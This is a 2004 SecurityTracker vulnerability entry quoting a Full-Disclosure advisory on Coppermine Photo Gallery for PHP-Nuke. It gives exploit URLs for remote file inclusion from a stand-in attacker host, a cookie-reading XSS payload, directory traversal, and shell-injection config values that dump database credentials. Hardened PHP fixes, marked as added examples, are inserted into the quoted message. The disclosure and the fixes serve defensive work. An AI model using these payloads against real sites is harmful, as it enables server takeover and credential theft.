SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:   Application (Multimedia)  >   Coppermine Photo Gallery
Vendors:   DEMAR, Gregory
Coppermine Photo Gallery Include File Flaw Lets Remote Users Execute Arbitrary Code on the Target System
SecurityTracker Alert ID:  1010001
SecurityTracker URL:  http://securitytracker.com/id/1010001
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 30 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.2.2b, 1.2.0 RC4
Description:   Several vulnerabilities were reported in Coppermine Photo Gallery. A remote user can execute arbitrary PHP code on the target system, conduct cross-site scripting attacks, and determine the installation path.

Janek Vind "waraxe" reported that the software includes a PHP file without validating the source of the file. As a result, a remote user can supply a specially crafted URL to cause the target server to include and execute a remote file. The PHP code in the file (including operating system commands) will execute on the target system with the privileges of the target web service.

In version 1.2.0 RC4, the 'init.inc.php' file will reportedly include the '/include/functions.inc.php' file from a remote location if the 'CPG_M_DIR' variable points to the remote location. A demonstration exploit URL is provided:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com

In version 1.2.2b, the 'theme.php' file will reportedly include the '/user_list_info_box.inc' file if the 'THEME_DIR' variable points to a remote location. Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

It is also reported that several scripts will disclose the installation path to remote users. Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php

It is also reported that version 1.2.2b does not properly filter HTML code from user-supplied input in the CPG_URL variable. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Coppermine Photo Gallery software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>

It is also reported that a remote authenticated user with PHP-Nuke administrative privileges can view the PHP-Nuke directory structure with the following type of URL:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

It is also reported that a remote authenticated user with PHP-Nuke administrative privileges can execute arbitrary shell commands by submitting specially crafted 'impath' and 'jpeg_qual' configuration parameters. A demonstration exploit method is described in the Source Message.

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Coppermine Photo Gallery software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

A remote authenticated user with PHP-Nuke administrative privileges can view directories and execute arbitrary shell commands on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  coppermine.sourceforge.net/
Cause:   Access control error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Fri, 30 Apr 2004 09:37:40 -0700 (PDT)
Subject:  [Full-Disclosure] [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke]




{================================================================================}
{                              [waraxe-2004-SA#026]                              }
{================================================================================}
{                                                                                }
{     [ Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke ]       }
{                                                                                }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 29. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=26


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Coppermine Photo Gallery 1.2.2b for CMS
Copyright (C) 2002,2003  Grégory DEMAR
<gdemar@wanadoo.fr>
http://www.chezgreg.net/coppermine/  
Updated by the Coppermine Dev Team 
http://coppermine.sf.net/team/
New Port by GoldenTroll
http://coppermine.findhere.org/
Based on coppermine 1.1d by Surf
http://www.surf4all.net/
http://coppermine.findhere.org

I have tested two versions of Coppermine: 1.2.2b and 1.2.0 RC4, which I will name further as "new version" and "old version".


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

Many scripts in the Coppermine software package are not protected against direct access; therefore standard PHP error messages can be provoked, which leads to exposure of the full path to the scripts. Such a piece of information has great value for a potential attacker, who will use this in the next steps of hacking.

Version scope: both new and old versions are affected.

Examples:

http://localhost/nuke72/modules/coppermine/phpinfo.php
http://localhost/nuke72/modules/coppermine/addpic.php
http://localhost/nuke72/modules/coppermine/config.php
http://localhost/nuke72/modules/coppermine/db_input.php
http://localhost/nuke72/modules/coppermine/displayecard.php
http://localhost/nuke72/modules/coppermine/ecard.php
http://localhost/nuke72/modules/coppermine/include/crop.inc.php



B. Cross-site scripting aka XSS:

Can be used by a potential attacker for stealing cookies and doing other operations which, in normal conditions, are not permitted by the browser's cross-domain security restrictions.

Version scope: only new version is affected.

Examples:

http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar">[xss code here]
http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>


C. Arbitrary directory browsing (needs nuke admin rights!):

PhpNuke is known for its many security bugs, leading to admin account takeover by an attacker. So needing admin rights to use this exploit is not such a big restriction ...

Version scope: both new and old versions are affected.

Example:

http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..

... and we can see PhpNuke's root directory structure ;)


D. Execution of arbitrary shell commands on the server (needs nuke admin rights!):

Yes, again we need PhpNuke admin privileges to accomplish this exploit, but as said before, there are many ways to compromise nuke's admin account.

Version scope: both new and old versions are affected.

So, how can we give any shell commands to the server? Let's look at Coppermine's original source in "coppermine/include/picmgmtbatch.inc.php":


    // Method for thumbnails creation
    switch ($method) {
        case "im" :
          // Windows host: the path of this file carries a drive letter or backslash
          if (preg_match("#[A-Z]:|\\\\#Ai", __FILE__)) {
            // get the basedir, remove '/include'
            $cur_dir = "";
            $src_file = '"' . strtr($src_file, '/', '\\') . '"';
            $im_dest_file = str_replace('%', '%%', ('"' . strtr($dest_file, '/', '\\') . '"'));
          } else {
            // Unix host: the two file names are quoted for the shell
            $src_file = escapeshellarg($src_file);
            $im_dest_file = str_replace('%', '%%', escapeshellarg($dest_file));
          }

          $output = array();
          // the $CONFIG values are interpolated into the command string as-is
          $cmd = "{$CONFIG['impath']}convert -quality {$CONFIG['jpeg_qual']} {$CONFIG['im_options']} -geometry {$destWidth}x{$destHeight} $src_file $im_dest_file";

          //die("$cmd");

          exec ($cmd, $output, $retval);

          if ($retval) {
            $ERROR = "Error executing ImageMagick - Return value: $retval";
            if ($CONFIG['debug_mode']) {

As we can see, there is a very dangerous PHP function "exec()" in use, and some user input - the variables "$src_file" and "$dest_file" - is sanitized by "escapeshellarg()". All seems to be OK? Yes... oops... what about the config variables "$CONFIG['impath']", "$CONFIG['jpeg_qual']" etc.? Coppermine's authors were assuming that those variables are safe to use directly in "exec()"... But if we have nuke admin rights, we can manipulate those configuration parameters, and therefore various shell commands can be injected into "exec()"!

You want details? Go to Coppermine's configuration panel and set "Method for resizing images" to "Image Magick". Next, set "Path to ImageMagick" to a value which includes the shell command you want to execute on the server. Example "path" in case of a Windows server: "type config.php > config.txt &", Linux server: "cat config.php > config.txt ;". Now "save new configuration", then upload some pictures to the server and go to "Batch add pictures". And if all went right, then you will see a "config.txt" file in the phpnuke root directory, so anyone can see in plaintext information with critical value - database name, username and password ;)

Of course, a skilled attacker can within 5 minutes get a remote shell running on the server through an arbitrary port (higher than 1024), and the next hacking is not logged anymore, because the webserver is bypassed. One more step - finding and using a local r00t exploit - and the server is 0wned ;)
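A hardened rewrite of that command construction, added here as an example and not taken from Coppermine: the admin-editable config values are validated (impath as a plain existing directory, jpeg_qual as an integer, im_options against an allowlist) before anything reaches exec(). The function name and the allowlist are this example's own assumptions, and only the non-Windows branch is shown.

```php
<?php
// Added example, not Coppermine's code: the convert command from
// picmgmtbatch.inc.php rebuilt so that the admin-editable config values
// (impath, jpeg_qual, im_options) are validated before exec() sees them.
// Only the POSIX branch is shown; the function name is this example's own.

function build_convert_cmd(array $config, string $src_file, string $dest_file,
                           int $destWidth, int $destHeight): string
{
    // impath: empty (convert is on PATH) or an existing directory made of
    // plain path characters; "cat config.php > config.txt ;" fails both tests.
    $impath = (string)($config['impath'] ?? '');
    if ($impath !== '') {
        if (!preg_match('#^[A-Za-z0-9_./-]+$#', $impath) || !is_dir($impath)) {
            throw new InvalidArgumentException('impath is not a plain directory');
        }
        $impath = rtrim($impath, '/') . '/';
    }

    // jpeg_qual: an integer from 0 to 100, nothing else reaches the shell.
    $qual = filter_var($config['jpeg_qual'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 0, 'max_range' => 100]]);
    if ($qual === false) {
        throw new InvalidArgumentException('jpeg_qual must be an integer 0-100');
    }

    // im_options: a constructed allowlist instead of a free-form string.
    $allowed_opts = ['', '-strip', '+repage'];
    $opts = trim((string)($config['im_options'] ?? ''));
    if (!in_array($opts, $allowed_opts, true)) {
        throw new InvalidArgumentException('im_options not in allowlist');
    }

    // Geometry is rebuilt from integers; every path is quoted by escapeshellarg.
    $geometry = sprintf('%dx%d', $destWidth, $destHeight);
    return escapeshellarg($impath . 'convert') . " -quality $qual"
         . ($opts !== '' ? " $opts" : '') . " -geometry $geometry "
         . escapeshellarg($src_file) . ' ' . escapeshellarg($dest_file);
}

// Constructed check: the advisory's Linux payload is rejected, a sane config passes.
foreach ([['impath' => 'cat config.php > config.txt ;', 'jpeg_qual' => 80],
          ['impath' => '', 'jpeg_qual' => 80, 'im_options' => '-strip']] as $cfg) {
    try {
        echo build_convert_cmd($cfg, 'a.jpg', 'thumbs/a.jpg', 100, 75), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```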


E. Remote file inclusion:

Version scope: both new and old versions are affected (different bugs in different scripts).

There exist remote file inclusion vulnerabilities in Coppermine Photo Gallery which can lead to arbitrary PHP code parsing, shell command injection, etc. And as discussed before, finally this can lead to total compromise of the victim server.

E1 - affected is old version:

First get your PHP script ready at "http://attacker.com/include/functions.inc.php" and then:

http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://attacker.com



E2 - affected is new version:

First get your PHP script ready at "http://attacker.com/user_list_info_box.inc" and then:

http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/maze/theme.php?THEME_DIR=http://attacker.com

Of course, the attacker's server, where those scripts are, must NOT PARSE PHP!!
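An added example, not Coppermine's code, of how the E1 and E2 includes can be written so that no request parameter chooses the included file: the module directory is derived from the script's own location, and a theme name is accepted only from an allowlist and then resolved with realpath() inside the themes root. The helper names, the theme allowlist and the temporary directory used for the demonstration are assumptions.

```php
<?php
// Added example, not Coppermine's code: the E1/E2 includes rewritten so that
// no request parameter (CPG_M_DIR, THEME_DIR under register_globals) can
// choose the file that gets included. Helper names and paths are assumed.

// E1: init.inc.php lives in modules/coppermine/include/, so the module root
// is a property of the file itself and is never read from $CPG_M_DIR.
function module_functions_file(): string
{
    $cpg_m_dir = dirname(__DIR__);                 // .../modules/coppermine
    return $cpg_m_dir . '/include/functions.inc.php';
}

// E2: theme.php takes a theme *name*, checks it against an allowlist and then
// verifies that the resolved directory really lies inside the themes root.
function safe_theme_dir(string $themes_root, string $theme_name): string
{
    $allowed = ['default', 'coppercop', 'maze'];   // theme names from the advisory
    if (!in_array($theme_name, $allowed, true)) {
        throw new RuntimeException("unknown theme: $theme_name");
    }
    $root = realpath($themes_root);
    $dir  = realpath($themes_root . DIRECTORY_SEPARATOR . $theme_name);
    // realpath() returns false for URLs and missing dirs and collapses "..",
    // so neither "http://attacker.com" nor "../.." can pass the prefix test.
    if ($root === false || $dir === false
        || strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("theme dir escapes themes root: $theme_name");
    }
    return $dir;
}

// Constructed demo: a temporary themes tree with only "default" present, then
// the values an attacker could send and the one a legitimate page would use.
echo module_functions_file(), "\n";
$root = sys_get_temp_dir() . '/cpg_themes_' . getmypid();
mkdir("$root/default", 0700, true);
foreach (['default', 'http://attacker.com', '../..', 'maze'] as $name) {
    try {
        echo "$name => ", safe_theme_dir($root, $name), "\n";
    } catch (RuntimeException $e) {
        echo "$name => rejected (", $e->getMessage(), ")\n";
    }
}
rmdir("$root/default"); rmdir($root);
// In theme.php (themes/<name>/theme.php) the include then becomes:
//   $THEME_DIR = safe_theme_dir(dirname(__DIR__), basename($_GET['theme'] ?? 'default'));
//   require_once $THEME_DIR . '/user_list_info_box.inc';
```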

See ya!


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia! Greetings!
    Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------



	
		

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 



Copyright 2017, SecurityGlobal.net LLC